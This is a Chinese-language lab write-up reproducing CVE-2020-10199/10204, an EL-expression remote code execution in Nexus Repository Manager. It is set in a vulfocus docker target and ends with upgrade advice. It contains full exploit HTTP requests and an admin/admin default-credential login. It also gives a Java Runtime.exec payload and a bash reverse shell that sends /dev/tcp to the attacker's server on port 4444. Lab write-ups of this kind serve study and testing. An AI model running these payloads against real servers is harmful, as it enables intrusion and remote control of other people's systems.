目录
一、漏洞信息
二、影响版本
三、环境搭建
四、漏洞复现
五、修复建议
这里用的是docker desktop+vulfocus搭建的环境。
一、漏洞信息
名称: nexus 远程代码执行 (CVE-2020-10199/10204)
描述: Nexus Repository Manager(NXRM)是美国Sonatype公司的一款Maven仓库管理器。 CVE-2020-10199的漏洞需要普通用户权限即可触发,而CVE-2020-10204则需要管理员权限。两个漏洞的触发原因均是不安全的执行EL表达式导致的。
二、影响版本
Nexus Repository Manager OSS/Pro 3.x <= 3.21.1
三、环境搭建
运行docker desktop,运行vulfocus容器
打开vulfoucs,搜索CVE-2020-10199或nexus 远程代码执行
下载靶场,下面那个是CVE-2020-10204,这里就不下载了。
下载完成后启动靶场。
四、漏洞复现
访问地址,刚开始会初始化一会,等一下就好了
右上角登陆,弱口令admin/admin登录
登录时抓包,一个个放包,
比如这个包,获取里面的NX-ANTI-CSRF-TOKEN和Cookie里面的NXSESSIONID
之后在重放模块里面粘贴POC,这个包执行的是3个233相乘的表达式,通过这个表达式能否执行来判断漏洞存在与否
POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 靶场ip:端口
Content-Length: 203
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.7886248393834028
Content-Type: application/json
Accept: */*
Origin: 靶场ip:端口
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: 靶场ip:端口
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.7886248393834028; NXSESSIONID=cedf848f-d881-4b58-ac24-9e9c3ece40bc
Connection: close
{
"name": "internal",
"online": true,
"storage":
{
"blobStoreName": "default",
"strictContentTypeValidation": true
},
"group":
{
"memberNames": ["$\\A{233*233*233}"]
}
}
根据自己的情况修改一下。新建一个空的页面
将上面的poc粘贴进去, 我修改后是这样
POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 192.168.0.6:10787
Content-Length: 209
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.46798851483258597
Content-Type: application/json
Accept: */*
Origin: http://192.168.0.6:10787
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://192.168.0.6:10787/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.46798851483258597; NXSESSIONID=00e0ec13-4678-4247-b392-7310e0c64080
Connection: close
{
"name": "internal",
"online": true,
"storage":
{
"blobStoreName": "default",
"strictContentTypeValidation": true
},
"group":
{
"memberNames": ["$\\A{233*233*233}"]
}
}
发送,注意右上角的目标也要填
可以看到执行成功了。
修改memberNames的值为
$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}
可以看到执行成功,我们 ls /tmp看flag,发现回显一直是这个,那么就用nc反弹shell,
将exec里面执行的命令改为
/bin/bash -c bash$IFS$9-i>&/dev/tcp/{自己服务器ip}/4444<&1
这里我们用Ubuntu来nc监听,
然后发包
五、修复建议
升级至最新版本的Nexus Repository Manager(3.21.2或更高版本),可从Sonatype网站获得